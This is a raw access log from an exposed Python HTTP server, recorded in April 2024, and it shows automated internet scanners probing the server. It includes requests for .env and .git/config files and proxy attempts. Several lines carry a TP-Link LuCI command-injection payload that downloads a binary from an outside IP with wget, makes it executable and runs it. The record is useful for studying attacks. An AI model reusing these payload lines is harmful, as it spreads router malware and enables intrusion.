self.finish_request(request, client_address) File "/usr/lib/python3.11/http/server.py", line 1306, in finish_request self.RequestHandlerClass(request, client_address, self, File "/usr/lib/python3.11/http/server.py", line 667, in __init__ super().__init__(*args, **kwargs) File "/usr/lib/python3.11/socketserver.py", line 755, in __init__ self.handle() File "/usr/lib/python3.11/http/server.py", line 432, in handle self.handle_one_request() File "/usr/lib/python3.11/http/server.py", line 400, in handle_one_request self.raw_requestline = self.rfile.readline(65537) ^^^^^^^^^^^^^^^^^^^^^^^^^^ File "/usr/lib/python3.11/socket.py", line 706, in readinto return self._sock.recv_into(b) ^^^^^^^^^^^^^^^^^^^^^^^ ConnectionResetError: [Errno 104] Connection reset by peer ---------------------------------------- 167.172.111.146 - - [27/Apr/2024 17:30:40] "GET / HTTP/1.0" 200 - 167.172.111.146 - - [27/Apr/2024 17:30:41] "GET / HTTP/1.0" 200 - 167.172.111.146 - - [27/Apr/2024 17:30:41] code 404, message File not found 167.172.111.146 - - [27/Apr/2024 17:30:41] "GET /nmaplowercheck1714203040 HTTP/1.1" 404 - 167.172.111.146 - - [27/Apr/2024 17:30:41] code 501, message Unsupported method ('POST') 167.172.111.146 - - [27/Apr/2024 17:30:41] "POST /sdk HTTP/1.1" 501 - 167.172.111.146 - - [27/Apr/2024 17:30:41] code 404, message File not found 167.172.111.146 - - [27/Apr/2024 17:30:41] "GET /evox/about HTTP/1.1" 404 - 167.172.111.146 - - [27/Apr/2024 17:30:41] code 404, message File not found 167.172.111.146 - - [27/Apr/2024 17:30:41] "GET /HNAP1 HTTP/1.1" 404 - 167.172.111.146 - - [27/Apr/2024 17:30:42] "GET / HTTP/1.0" 200 - 167.172.111.146 - - [27/Apr/2024 17:30:43] "GET / HTTP/1.1" 200 - 207.154.250.186 - - [27/Apr/2024 17:30:43] code 404, message File not found 207.154.250.186 - - [27/Apr/2024 17:30:43] "GET /query?q=SHOW+DIAGNOSTICS HTTP/1.1" 404 - 139.59.155.32 - - [27/Apr/2024 17:30:43] code 404, message File not found 139.59.155.32 - - [27/Apr/2024 17:30:43] "GET /cgi-bin/authLogin.cgi HTTP/1.1" 404 - 64.226.100.159 - - [27/Apr/2024 17:30:43] code 404, message File not found 64.226.100.159 - - [27/Apr/2024 17:30:43] "GET /v2/_catalog HTTP/1.1" 404 - 104.248.31.95 - - [27/Apr/2024 17:31:46] code 400, message Bad request version ('À\\x13À') 104.248.31.95 - - [27/Apr/2024 17:31:46] "\x16\x03\x01\x00î\x01\x00\x00ê\x03\x03º:i¢\x90\x130ñ)öªÚ5ËT\x09pÿñ6¨,\x07Éú¢vÑ$áF& \x8cöÓÊî}Oÿnj\x074T\x01\x999yÂW\x18¼lÄñÓ\x18\x8d°\x088´]\x00&À+À/À,À0̨̩À\x09À\x13À" 400 - 104.248.31.95 - - [27/Apr/2024 17:31:46] code 400, message Bad request version ('À\\x13À') 104.248.31.95 - - [27/Apr/2024 17:31:46] "\x16\x03\x01\x00î\x01\x00\x00ê\x03\x03/¨¾ü¹Î\x8bA\x9cSèe¡\x12\x06*}\x96K·\x14Õ¯ EÓ¹H#;.P \x87Û÷cZà\x0fL3fNj%÷»VìN\x0b\x91\x13±/\x18ó'J2\x9e6V±\x00&À+À/À,À0̨̩À\x09À\x13À" 400 - 104.248.31.95 - - [27/Apr/2024 17:31:47] code 400, message Bad HTTP/0.9 request type ('\\x16\\x03\\x01\\x00î\\x01\\x00\\x00ê\\x03\\x03µç9þ;g\\x84÷\\x18Ò$çun') 104.248.31.95 - - [27/Apr/2024 17:31:47] "\x16\x03\x01\x00î\x01\x00\x00ê\x03\x03µç9þ;g\x84÷\x18Ò$çun\x1dÔ\x83¶\x8fêÊ" 400 - 64.226.100.159 - - [27/Apr/2024 17:39:49] code 404, message File not found 64.226.100.159 - - [27/Apr/2024 17:39:49] "GET /solr/admin/info/system HTTP/1.1" 404 - 64.226.100.159 - - [27/Apr/2024 17:39:50] code 404, message File not found 64.226.100.159 - - [27/Apr/2024 17:39:50] "GET /solr/admin/cores?action=STATUS&wt=json HTTP/1.1" 404 - 146.19.24.28 - - [27/Apr/2024 18:15:26] "GET / HTTP/1.1" 200 - ---------------------------------------- Exception occurred during processing of request from ('167.94.145.110', 35078) Traceback (most recent call last): File "/usr/lib/python3.11/socketserver.py", line 691, in process_request_thread self.finish_request(request, client_address) File "/usr/lib/python3.11/http/server.py", line 1306, in finish_request self.RequestHandlerClass(request, client_address, self, File "/usr/lib/python3.11/http/server.py", line 667, in __init__ super().__init__(*args, **kwargs) File "/usr/lib/python3.11/socketserver.py", line 755, in __init__ self.handle() File "/usr/lib/python3.11/http/server.py", line 432, in handle self.handle_one_request() File "/usr/lib/python3.11/http/server.py", line 400, in handle_one_request self.raw_requestline = self.rfile.readline(65537) ^^^^^^^^^^^^^^^^^^^^^^^^^^ File "/usr/lib/python3.11/socket.py", line 706, in readinto return self._sock.recv_into(b) ^^^^^^^^^^^^^^^^^^^^^^^ ConnectionResetError: [Errno 104] Connection reset by peer ---------------------------------------- 167.94.145.110 - - [27/Apr/2024 18:23:10] "GET / HTTP/1.1" 200 - 167.94.145.110 - - [27/Apr/2024 18:23:14] "GET / HTTP/1.1" 200 - 167.94.145.110 - - [27/Apr/2024 18:23:15] code 505, message Invalid HTTP version (2.0) 167.94.145.110 - - [27/Apr/2024 18:23:15] "PRI * HTTP/2.0" 505 - 167.94.145.110 - - [27/Apr/2024 18:23:16] code 404, message File not found 167.94.145.110 - - [27/Apr/2024 18:23:16] "GET /favicon.ico HTTP/1.1" 404 - 185.224.128.43 - - [27/Apr/2024 18:33:27] "GET / HTTP/1.1" 200 - 179.43.190.218 - - [27/Apr/2024 19:12:45] code 404, message File not found 179.43.190.218 - - [27/Apr/2024 19:12:45] "GET /cgi-bin/luci/;stok=/locale?form=country&operation=write&country=$(cd+%2Ftmp%3B+rm+-rf+shk%3B+wget+http%3A%2F%2F103.163.214.97%2Fshk%3B+chmod+777+shk%3B+.%2Fshk+tplink%3B+rm+-rf+shk) HTTP/1.1" 404 - 45.142.182.92 - - [27/Apr/2024 19:37:54] code 404, message File not found 45.142.182.92 - - [27/Apr/2024 19:37:54] "GET /cgi-bin/luci/;stok=/locale?form=country&operation=write&country=$(id>`cd+/tmp;+rm+-rf+shk;+wget+http://103.163.214.97/shk;+chmod+777+shk;+./shk+tplink;+rm+-rf+shk`) HTTP/1.1" 404 - 185.170.144.3 - - [27/Apr/2024 20:02:23] code 400, message Bad HTTP/0.9 request type ('\\x03\\x00\\x00/*à\\x00\\x00\\x00\\x00\\x00Cookie:') 185.170.144.3 - - [27/Apr/2024 20:02:23] "\x03\x00\x00/*à\x00\x00\x00\x00\x00Cookie: mstshash=Administr" 400 - 87.121.69.52 - - [27/Apr/2024 20:15:37] code 501, message Unsupported method ('CONNECT') 87.121.69.52 - - [27/Apr/2024 20:15:37] "CONNECT google.com:443 HTTP/1.1" 501 - 162.216.149.67 - - [27/Apr/2024 20:27:49] "GET / HTTP/1.1" 200 - 141.98.11.79 - - [27/Apr/2024 20:43:14] code 501, message Unsupported method ('CONNECT') 141.98.11.79 - - [27/Apr/2024 20:43:14] "CONNECT google.com:443 HTTP/1.1" 501 - 198.235.24.13 - - [27/Apr/2024 21:44:40] code 400, message Bad request version ('À\\x13À') 198.235.24.13 - - [27/Apr/2024 21:44:40] "\x16\x03\x01\x00î\x01\x00\x00ê\x03\x033\x12\x0dkÖ!#ñ*Õ®X Ö\x03\x0e×9\x9c\x1a8¤óÆc\x9ajDÓ\x07x= s£ë_&æô8\x1d\x0d"\x85\x03¨\x89\x19$ÛÐà8\x13M¯\x0c\x1eê7`dJ=\x00&À+À/À,À0̨̩À\x09À\x13À" 400 - 198.235.24.13 - - [27/Apr/2024 21:44:40] code 400, message Bad HTTP/0.9 request type ("\\x16\\x03\\x01\\x00Ê\\x01\\x00\\x00Æ\\x03\\x03\\x04Ó¬u{ªò0ÊÖ=I\\x98\\x07\\x1b£\\x06cùÛ¹~xîü:\\x07ÅJÎ\\x8dp\\x00\\x00hÌ\\x14Ì\\x13À/À+À0À,À\\x11À\\x07À'À#À\\x13À") 198.235.24.13 - - [27/Apr/2024 21:44:40] "\x16\x03\x01\x00Ê\x01\x00\x00Æ\x03\x03\x04Ó¬u{ªò0ÊÖ=I\x98\x07\x1b£\x06cùÛ¹~xîü:\x07ÅJÎ\x8dp\x00\x00hÌ\x14Ì\x13À/À+À0À,À\x11À\x07À'À#À\x13À\x09À(À$À\x14À" 400 - 162.243.144.4 - - [27/Apr/2024 21:49:58] "GET / HTTP/1.1" 200 - 64.62.197.190 - - [27/Apr/2024 22:09:26] "GET / HTTP/1.1" 200 - 64.62.197.192 - - [27/Apr/2024 22:11:35] code 404, message File not found 64.62.197.192 - - [27/Apr/2024 22:11:35] "GET /favicon.ico HTTP/1.1" 404 - 64.62.197.191 - - [27/Apr/2024 22:12:15] code 404, message File not found 64.62.197.191 - - [27/Apr/2024 22:12:15] "GET /geoserver/web/ HTTP/1.1" 404 - 159.100.13.152 - - [27/Apr/2024 22:40:49] code 404, message File not found 159.100.13.152 - - [27/Apr/2024 22:40:49] "GET /.git/config HTTP/1.1" 404 - 109.205.213.198 - - [27/Apr/2024 22:44:05] "GET / HTTP/1.1" 200 - 74.82.47.2 - - [27/Apr/2024 22:50:02] code 400, message Bad request version ('À\\x14À') 74.82.47.2 - - [27/Apr/2024 22:50:02] "\x16\x03\x01\x00{\x01\x00\x00w\x03\x03\x9f\x8aÓ]¶Ô* \x84R\x8f×NA¥\x0fuô\x96j¾nÞ\x8a\x7fdç9{³M¿\x00\x00\x1aÀ/À+À\x11À\x07À\x13À\x09À\x14À" 400 - 185.191.126.213 - - [28/Apr/2024 00:19:47] "GET / HTTP/1.1" 200 - 194.50.16.190 - - [28/Apr/2024 00:26:35] "GET / HTTP/1.1" 200 - 185.224.128.43 - - [28/Apr/2024 00:34:04] "GET / HTTP/1.1" 200 - 111.243.126.216 - - [28/Apr/2024 01:03:21] code 404, message File not found 111.243.126.216 - - [28/Apr/2024 01:03:21] "GET /cdn-cgi/trace HTTP/1.1" 404 - 162.243.135.44 - - [28/Apr/2024 01:03:31] code 400, message Bad request syntax ('MGLNDD_203.219.129.101_80') 162.243.135.44 - - [28/Apr/2024 01:03:31] "MGLNDD_203.219.129.101_80" 400 - 146.19.24.28 - - [28/Apr/2024 01:11:54] "GET / HTTP/1.1" 200 - 3.101.240.170 - - [28/Apr/2024 02:09:20] "HEAD / HTTP/1.1" 200 - 87.121.69.52 - - [28/Apr/2024 02:19:10] code 501, message Unsupported method ('CONNECT') 87.121.69.52 - - [28/Apr/2024 02:19:10] "CONNECT google.com:443 HTTP/1.1" 501 - ---------------------------------------- Exception occurred during processing of request from ('199.45.154.59', 41082) Traceback (most recent call last): File "/usr/lib/python3.11/socketserver.py", line 691, in process_request_thread self.finish_request(request, client_address) File "/usr/lib/python3.11/http/server.py", line 1306, in finish_request self.RequestHandlerClass(request, client_address, self, File "/usr/lib/python3.11/http/server.py", line 667, in __init__ super().__init__(*args, **kwargs) File "/usr/lib/python3.11/socketserver.py", line 755, in __init__ self.handle() File "/usr/lib/python3.11/http/server.py", line 432, in handle self.handle_one_request() File "/usr/lib/python3.11/http/server.py", line 400, in handle_one_request self.raw_requestline = self.rfile.readline(65537) ^^^^^^^^^^^^^^^^^^^^^^^^^^ File "/usr/lib/python3.11/socket.py", line 706, in readinto return self._sock.recv_into(b) ^^^^^^^^^^^^^^^^^^^^^^^ ConnectionResetError: [Errno 104] Connection reset by peer ---------------------------------------- 199.45.154.59 - - [28/Apr/2024 02:29:08] "GET / HTTP/1.1" 200 - 199.45.154.59 - - [28/Apr/2024 02:29:11] "GET / HTTP/1.1" 200 - 199.45.154.59 - - [28/Apr/2024 02:29:12] code 505, message Invalid HTTP version (2.0) 199.45.154.59 - - [28/Apr/2024 02:29:12] "PRI * HTTP/2.0" 505 - 199.45.154.59 - - [28/Apr/2024 02:29:13] code 404, message File not found 199.45.154.59 - - [28/Apr/2024 02:29:13] "GET /favicon.ico HTTP/1.1" 404 - 45.142.182.92 - - [28/Apr/2024 02:50:27] code 404, message File not found 45.142.182.92 - - [28/Apr/2024 02:50:27] "GET /cgi-bin/luci/;stok=/locale?form=country&operation=write&country=$(id>`cd+/tmp;+rm+-rf+shk;+wget+http://103.163.214.97/shk;+chmod+777+shk;+./shk+tplink;+rm+-rf+shk`) HTTP/1.1" 404 - 201.76.102.96 - - [28/Apr/2024 02:58:38] "GET / HTTP/1.1" 200 - 85.239.33.117 - - [28/Apr/2024 03:42:48] "GET / HTTP/1.1" 200 - 85.239.33.117 - - [28/Apr/2024 03:43:37] code 404, message File not found 85.239.33.117 - - [28/Apr/2024 03:43:37] "GET /.env HTTP/1.1" 404 - 109.205.213.198 - - [28/Apr/2024 04:21:36] "GET / HTTP/1.1" 200 - 185.224.128.43 - - [28/Apr/2024 04:45:25] "GET / HTTP/1.1" 200 - 185.191.126.213 - - [28/Apr/2024 05:57:50] "GET / HTTP/1.1" 200 - 198.235.24.224 - - [28/Apr/2024 06:27:40] "GET / HTTP/1.0" 200 - 185.180.143.6 - - [28/Apr/2024 07:47:36] "GET / HTTP/1.1" 200 - 185.180.143.6 - - [28/Apr/2024 07:47:37] code 404, message File not found 185.180.143.6 - - [28/Apr/2024 07:47:37] "GET /cf_scripts/scripts/ajax/ckeditor/ckeditor.js HTTP/1.1" 404 - 198.235.24.86 - - [28/Apr/2024 07:48:04] code 400, message Bad request version ('À\\x13À') 198.235.24.86 - - [28/Apr/2024 07:48:04] "\x16\x03\x01\x00î\x01\x00\x00ê\x03\x03B½\x8a´»\x08Tó¸ë]\x86\x0bØ%E\x9fûÈ}C\x84\x90öðá»\x057\x07e. \x84îíð5\x99\x84\x9f\x81bê\x10Ä Äé\x1b\x0eQa³õ§>ÝÍq~\x05Óï¹\x00&À+À/À,À0̨̩À\x09À\x13À" 400 - 198.235.24.86 - - [28/Apr/2024 07:48:04] code 400, message Bad request version ('À(À$À\\x14À') 198.235.24.86 - - [28/Apr/2024 07:48:04] "\x16\x03\x01\x00Ê\x01\x00\x00Æ\x03\x030*A\x85\x05¡é\x99r\x08*kf»û\x88a&e\x93\x84\x01\x92|ùüßÃá^û]\x00\x00hÌ\x14Ì\x13À/À+À0À,À\x11À\x07À'À#À\x13À\x09À(À$À\x14À" 400 - 35.240.121.17 - - [28/Apr/2024 08:00:13] "GET / HTTP/1.1" 200 - 130.211.54.158 - - [28/Apr/2024 08:00:14] "GET / HTTP/1.1" 200 - 130.211.54.158 - - [28/Apr/2024 08:00:15] "GET /ftpscraper.py HTTP/1.1" 200 - 130.211.54.158 - - [28/Apr/2024 08:00:15] "GET /IDR714.T.202312131214.png HTTP/1.1" 200 - 130.211.54.158 - - [28/Apr/2024 08:00:16] "GET /IDR714.T.202401170639.png HTTP/1.1" 200 - 130.211.54.158 - - [28/Apr/2024 08:00:16] "GET /IDR714.T.202401170649.png HTTP/1.1" 200 - 130.211.54.158 - - [28/Apr/2024 08:00:17] "GET /IDR714.T.202404050819.png HTTP/1.1" 200 - 130.211.54.158 - - [28/Apr/2024 08:00:18] "GET /images/ HTTP/1.1" 200 - 130.211.54.158 - - [28/Apr/2024 08:00:33] "GET /scraper-log.txt HTTP/1.1" 200 - ---------------------------------------- Exception occurred during processing of request from ('130.211.54.158', 45270) Traceback (most recent call last): File "/usr/lib/python3.11/socketserver.py", line 691, in process_request_thread self.finish_request(request, client_address) File "/usr/lib/python3.11/http/server.py", line 1306, in finish_request self.RequestHandlerClass(request, client_address, self, File "/usr/lib/python3.11/http/server.py", line 667, in __init__ super().__init__(*args, **kwargs) File "/usr/lib/python3.11/socketserver.py", line 755, in __init__ self.handle() File "/usr/lib/python3.11/http/server.py", line 432, in handle self.handle_one_request() File "/usr/lib/python3.11/http/server.py", line 420, in handle_one_request method() File "/usr/lib/python3.11/http/server.py", line 674, in do_GET self.copyfile(f, self.wfile) File "/usr/lib/python3.11/http/server.py", line 873, in copyfile shutil.copyfileobj(source, outputfile) File "/usr/lib/python3.11/shutil.py", line 200, in copyfileobj fdst_write(buf) File "/usr/lib/python3.11/socketserver.py", line 834, in write self._sock.sendall(b) BrokenPipeError: [Errno 32] Broken pipe ---------------------------------------- 130.211.54.158 - - [28/Apr/2024 08:00:34] "GET /server-log.txt HTTP/1.1" 200 - ---------------------------------------- Exception occurred during processing of request from ('130.211.54.158', 50774) Traceback (most recent call last): File "/usr/lib/python3.11/socketserver.py", line 691, in process_request_thread self.finish_request(request, client_address) File "/usr/lib/python3.11/http/server.py", line 1306, in finish_request self.RequestHandlerClass(request, client_address, self, File "/usr/lib/python3.11/http/server.py", line 667, in __init__ super().__init__(*args, **kwargs) File "/usr/lib/python3.11/socketserver.py", line 755, in __init__ self.handle() File "/usr/lib/python3.11/http/server.py", line 432, in handle self.handle_one_request() File "/usr/lib/python3.11/http/server.py", line 420, in handle_one_request method() File "/usr/lib/python3.11/http/server.py", line 674, in do_GET self.copyfile(f, self.wfile) File "/usr/lib/python3.11/http/server.py", line 873, in copyfile shutil.copyfileobj(source, outputfile) File "/usr/lib/python3.11/shutil.py", line 200, in copyfileobj fdst_write(buf) File "/usr/lib/python3.11/socketserver.py", line 834, in write self._sock.sendall(b) BrokenPipeError: [Errno 32] Broken pipe ---------------------------------------- 130.211.54.158 - - [28/Apr/2024 08:00:35] "GET /start.sh HTTP/1.1" 200 - 130.211.54.158 - - [28/Apr/2024 08:00:35] "GET /updateDNS.sh HTTP/1.1" 200 - 130.211.54.158 - - [28/Apr/2024 08:00:59] "GET /images/ HTTP/1.1" 200 - 130.211.54.158 - - [28/Apr/2024 08:01:14] "GET /images/0.png HTTP/1.1" 200 - 130.211.54.158 - - [28/Apr/2024 08:01:21] "GET /images/1.png HTTP/1.1" 200 - 130.211.54.158 - - [28/Apr/2024 08:01:23] "GET /images/2.png HTTP/1.1" 200 - 130.211.54.158 - - [28/Apr/2024 08:01:23] "GET /images/3.png HTTP/1.1" 200 - 130.211.54.158 - - [28/Apr/2024 08:01:24] "GET /images/4.png HTTP/1.1" 200 - 130.211.54.158 - - [28/Apr/2024 08:01:24] "GET /images/5.png HTTP/1.1" 200 - 130.211.54.158 - - [28/Apr/2024 08:01:25] "GET /images/6.png HTTP/1.1" 200 - 130.211.54.158 - - [28/Apr/2024 08:01:28] "GET /images/radar.png HTTP/1.1" 200 - 146.19.24.28 - - [28/Apr/2024 08:15:42] "GET / HTTP/1.1" 200 - 87.121.69.52 - - [28/Apr/2024 08:45:26] code 501, message Unsupported method ('CONNECT') 87.121.69.52 - - [28/Apr/2024 08:45:26] "CONNECT google.com:443 HTTP/1.1" 501 - 141.98.11.79 - - [28/Apr/2024 09:59:01] code 501, message Unsupported method ('CONNECT') 141.98.11.79 - - [28/Apr/2024 09:59:01] "CONNECT google.com:443 HTTP/1.1" 501 - 185.224.128.43 - - [28/Apr/2024 10:00:49] "GET / HTTP/1.1" 200 - 78.29.14.127 - - [28/Apr/2024 10:05:00] "GET / HTTP/1.1" 200 - 45.142.182.92 - - [28/Apr/2024 10:13:56] code 404, message File not found 45.142.182.92 - - [28/Apr/2024 10:13:56] "GET /cgi-bin/luci/;stok=/locale?form=country&operation=write&country=$(id>`cd+/tmp;+rm+-rf+shk;+wget+http://103.163.214.97/shk;+chmod+777+shk;+./shk+tplink;+rm+-rf+shk`) HTTP/1.1" 404 - 185.191.126.213 - - [28/Apr/2024 10:23:31] "GET / HTTP/1.1" 200 - 185.16.38.111 - - [28/Apr/2024 10:59:53] "GET / HTTP/1.1" 200 - 185.16.38.111 - - [28/Apr/2024 11:26:44] "GET / HTTP/1.1" 200 - 109.205.213.198 - - [28/Apr/2024 11:49:10] "GET / HTTP/1.1" 200 - 35.203.210.111 - - [28/Apr/2024 12:24:37] "GET / HTTP/1.1" 200 - 185.180.143.140 - - [28/Apr/2024 12:32:47] code 404, message File not found 185.180.143.140 - - [28/Apr/2024 12:32:47] "GET /favicon-32x32.png HTTP/1.1" 404 - 185.180.143.140 - - [28/Apr/2024 12:32:48] "GET / HTTP/1.1" 200 - 185.180.143.140 - - [28/Apr/2024 12:33:03] "GET / HTTP/1.1" 200 - 185.180.143.140 - - [28/Apr/2024 12:33:04] code 404, message File not found 185.180.143.140 - - [28/Apr/2024 12:33:04] "GET /webfig/ HTTP/1.1" 404 - 185.180.143.140 - - [28/Apr/2024 12:33:19] code 404, message File not found 185.180.143.140 - - [28/Apr/2024 12:33:19] "GET /cgi-bin/authLogin.cgi HTTP/1.1" 404 - 185.180.143.140 - - [28/Apr/2024 12:33:32] code 404, message File not found 185.180.143.140 - - [28/Apr/2024 12:33:32] "GET /favicon.ico HTTP/1.1" 404 - 185.180.143.140 - - [28/Apr/2024 12:33:46] "GET / HTTP/1.1" 200 - 185.180.143.140 - - [28/Apr/2024 12:33:46] code 404, message File not found 185.180.143.140 - - [28/Apr/2024 12:33:46] "GET /identity HTTP/1.1" 404 - 185.180.143.140 - - [28/Apr/2024 12:34:01] code 404, message File not found 185.180.143.140 - - [28/Apr/2024 12:34:01] "GET /index.jsp HTTP/1.1" 404 - 185.180.143.140 - - [28/Apr/2024 12:34:16] code 404, message File not found 185.180.143.140 - - [28/Apr/2024 12:34:16] "GET /showLogin.cc HTTP/1.1" 404 - 185.180.143.140 - - [28/Apr/2024 12:34:33] code 404, message File not found 185.180.143.140 - - [28/Apr/2024 12:34:33] "GET /admin/ HTTP/1.1" 404 - 185.180.143.140 - - [28/Apr/2024 12:34:33] code 404, message File not found 185.180.143.140 - - [28/Apr/2024 12:34:33] "GET /sugar_version.json HTTP/1.1" 404 - 185.180.143.140 - - [28/Apr/2024 12:34:50] code 404, message File not found 185.180.143.140 - - [28/Apr/2024 12:34:50] "GET /static/historypage.js HTTP/1.1" 404 - 185.180.143.140 - - [28/Apr/2024 12:35:06] code 404, message File not found 185.180.143.140 - - [28/Apr/2024 12:35:06] "GET /Telerik.Web.UI.WebResource.axd?type=rau HTTP/1.1" 404 - 185.180.143.140 - - [28/Apr/2024 12:35:25] "GET / HTTP/1.1" 200 - 185.180.143.140 - - [28/Apr/2024 12:35:26] code 404, message File not found 185.180.143.140 - - [28/Apr/2024 12:35:26] "GET /cf_scripts/scripts/ajax/ckeditor/ckeditor.js HTTP/1.1" 404 - 185.180.143.140 - - [28/Apr/2024 12:35:27] code 404, message File not found 185.180.143.140 - - [28/Apr/2024 12:35:27] "GET /zabbix/favicon.ico HTTP/1.1" 404 - 185.180.143.140 - - [28/Apr/2024 12:35:48] code 404, message File not found 185.180.143.140 - - [28/Apr/2024 12:35:48] "GET /api/session/properties HTTP/1.1" 404 - 185.180.143.140 - - [28/Apr/2024 12:36:06] code 404, message File not found 185.180.143.140 - - [28/Apr/2024 12:36:06] "GET /sitecore/shell/sitecore.version.xml HTTP/1.1" 404 - 185.180.143.140 - - [28/Apr/2024 12:36:17] code 404, message File not found 185.180.143.140 - - [28/Apr/2024 12:36:17] "GET /js/NewWindow_2_all.js HTTP/1.1" 404 - 185.180.143.140 - - [28/Apr/2024 12:36:18] code 404, message File not found 185.180.143.140 - - [28/Apr/2024 12:36:18] "GET /solr/ HTTP/1.1" 404 - 185.180.143.140 - - [28/Apr/2024 12:36:29] code 404, message File not found 185.180.143.140 - - [28/Apr/2024 12:36:29] "GET /favicon.ico HTTP/1.1" 404 - 185.180.143.8 - - [28/Apr/2024 12:52:42] code 404, message File not found 185.180.143.8 - - [28/Apr/2024 12:52:42] "GET /WebInterface/ HTTP/1.1" 404 - 3.101.226.163 - - [28/Apr/2024 12:55:50] "HEAD / HTTP/1.1" 200 - 3.101.226.163 - - [28/Apr/2024 12:55:54] "GET / HTTP/1.1" 200 - 80.94.92.60 - - [28/Apr/2024 13:38:16] code 404, message File not found 80.94.92.60 - - [28/Apr/2024 13:38:16] "GET /dispatch.asp HTTP/1.1" 404 - 45.142.182.92 - - [28/Apr/2024 14:06:09] code 404, message File not found 45.142.182.92 - - [28/Apr/2024 14:06:09] "GET /cgi-bin/luci/;stok=/locale?form=country&operation=write&country=$(id>`cd+/tmp;+rm+-rf+shk;+wget+http://103.163.214.97/shk;+chmod+777+shk;+./shk+tplink;+rm+-rf+shk`) HTTP/1.1" 404 - 146.190.231.213 - - [28/Apr/2024 14:47:41] "GET / HTTP/1.1" 200 - 146.19.24.28 - - [28/Apr/2024 14:52:26] "GET / HTTP/1.1" 200 - 161.35.166.55 - - [28/Apr/2024 14:57:37] code 400, message Bad request version ('\\x19x¦\\x95A]ü\\x97©\\x00\\x01<Ì\\x14Ì\\x13Ì\\x15À0À,À(À$À\\x14À') 161.35.166.55 - - [28/Apr/2024 14:57:37] "\x16\x03\x01\x01þ\x01\x00\x01ú\x03\x03ü\x0bv°\x83\x9a5ïzõ]µ»\x8fl4ôôñ0c\x8d\x85\x19x¦\x95A]ü\x97©\x00\x01<Ì\x14Ì\x13Ì\x15À0À,À(À$À\x14À" 400 - 185.224.128.43 - - [28/Apr/2024 15:36:12] "GET / HTTP/1.1" 200 - 106.75.37.54 - - [28/Apr/2024 16:06:29] "GET / HTTP/1.1" 200 - 106.75.37.54 - - [28/Apr/2024 16:07:19] "GET /start.sh HTTP/1.1" 200 - 46.174.191.30 - - [28/Apr/2024 16:08:01] "GET / HTTP/1.0" 200 - 106.75.37.54 - - [28/Apr/2024 16:08:44] "GET /updateDNS.sh HTTP/1.1" 200 - 185.16.38.111 - - [28/Apr/2024 16:39:09] "GET / HTTP/1.1" 200 - 84.54.51.37 - - [28/Apr/2024 16:45:57] code 404, message File not found 84.54.51.37 - - [28/Apr/2024 16:45:57] "GET /cgi-bin/luci/;stok=/locale?form=country&operation=write&country=$(id%3E%60cd+%2Ftmp%3B+rm+-rf+r%3B+wget+http%3A%2F%2F94.156.79.193%2Fr%3B+chmod+777+r%3B+.%2Fr+tplink%3B+rm+-rf+r%60) HTTP/1.1" 404 - 109.205.213.198 - - [28/Apr/2024 16:49:38] "GET / HTTP/1.1" 200 - ---------------------------------------- Exception occurred during processing of request from ('162.142.125.215', 45206) Traceback (most recent call last): File "/usr/lib/python3.11/socketserver.py", line 691, in process_request_thread self.finish_request(request, client_address) File "/usr/lib/python3.11/http/server.py", line 1306, in finish_request self.RequestHandlerClass(request, client_address, self, File "/usr/lib/python3.11/http/server.py", line 667, in __init__ super().__init__(*args, **kwargs) File "/usr/lib/python3.11/socketserver.py", line 755, in __init__ self.handle() File "/usr/lib/python3.11/http/server.py", line 432, in handle self.handle_one_request() File "/usr/lib/python3.11/http/server.py", line 400, in handle_one_request self.raw_requestline = self.rfile.readline(65537) ^^^^^^^^^^^^^^^^^^^^^^^^^^ File "/usr/lib/python3.11/socket.py", line 706, in readinto return self._sock.recv_into(b) ^^^^^^^^^^^^^^^^^^^^^^^ ConnectionResetError: [Errno 104] Connection reset by peer ---------------------------------------- 162.142.125.215 - - [28/Apr/2024 16:55:23] "GET / HTTP/1.1" 200 - 162.142.125.215 - - [28/Apr/2024 16:55:26] "GET / HTTP/1.1" 200 - 162.142.125.215 - - [28/Apr/2024 16:55:27] code 505, message Invalid HTTP version (2.0) 162.142.125.215 - - [28/Apr/2024 16:55:27] "PRI * HTTP/2.0" 505 - 162.142.125.215 - - [28/Apr/2024 16:55:27] code 404, message File not found 162.142.125.215 - - [28/Apr/2024 16:55:27] "GET /favicon.ico HTTP/1.1" 404 - 104.152.52.142 - - [28/Apr/2024 18:10:00] "GET / HTTP/1.0" 200 - 185.16.38.111 - - [28/Apr/2024 18:45:02] "GET / HTTP/1.1" 200 - 83.97.73.245 - - [28/Apr/2024 19:13:50] "GET /?XDEBUG_SESSION_START=phpstorm HTTP/1.1" 200 - 83.97.73.245 - - [28/Apr/2024 20:19:11] code 404, message File not found 83.97.73.245 - - [28/Apr/2024 20:19:11] "GET /actuator/gateway/routes HTTP/1.1" 404 - 185.224.128.43 - - [28/Apr/2024 20:26:09] "GET / HTTP/1.1" 200 - 64.62.156.77 - - [28/Apr/2024 20:28:49] code 400, message Bad HTTP/0.9 request type ('\\x16\\x03\\x01\\x00{\\x01\\x00\\x00w\\x03\\x03`¨¬°\\x92Þ<ÀÖ\\x8d\\x8a') 64.62.156.77 - - [28/Apr/2024 20:28:49] "\x16\x03\x01\x00{\x01\x00\x00w\x03\x03`¨¬°\x92Þ<ÀÖ\x8d\x8a\x1d\x9eÙ\x05¡÷ÃѸn\x93" 400 - 146.19.24.28 - - [28/Apr/2024 21:14:30] "GET / HTTP/1.1" 200 - 47.88.90.156 - - [28/Apr/2024 21:15:35] "GET / HTTP/1.1" 200 - 47.88.94.28 - - [28/Apr/2024 21:15:36] code 404, message File not found 47.88.94.28 - - [28/Apr/2024 21:15:36] "GET /Public/home/js/check.js HTTP/1.1" 404 - 47.88.6.178 - - [28/Apr/2024 21:15:37] code 404, message File not found 47.88.6.178 - - [28/Apr/2024 21:15:37] "GET /static/admin/javascript/hetong.js HTTP/1.1" 404 - 64.62.197.115 - - [28/Apr/2024 21:20:25] "GET / HTTP/1.1" 200 - 64.62.197.111 - - [28/Apr/2024 21:22:28] code 404, message File not found 64.62.197.111 - - [28/Apr/2024 21:22:28] "GET /favicon.ico HTTP/1.1" 404 - 64.62.197.113 - - [28/Apr/2024 21:23:07] code 404, message File not found 64.62.197.113 - - [28/Apr/2024 21:23:07] "GET /geoserver/web/ HTTP/1.1" 404 - 117.220.184.191 - - [28/Apr/2024 22:00:36] "GET / HTTP/1.1" 200 - 141.98.11.79 - - [28/Apr/2024 22:06:41] code 501, message Unsupported method ('CONNECT') 141.98.11.79 - - [28/Apr/2024 22:06:41] "CONNECT google.com:443 HTTP/1.1" 501 - 103.245.236.120 - - [28/Apr/2024 23:46:44] code 404, message File not found 103.245.236.120 - - [28/Apr/2024 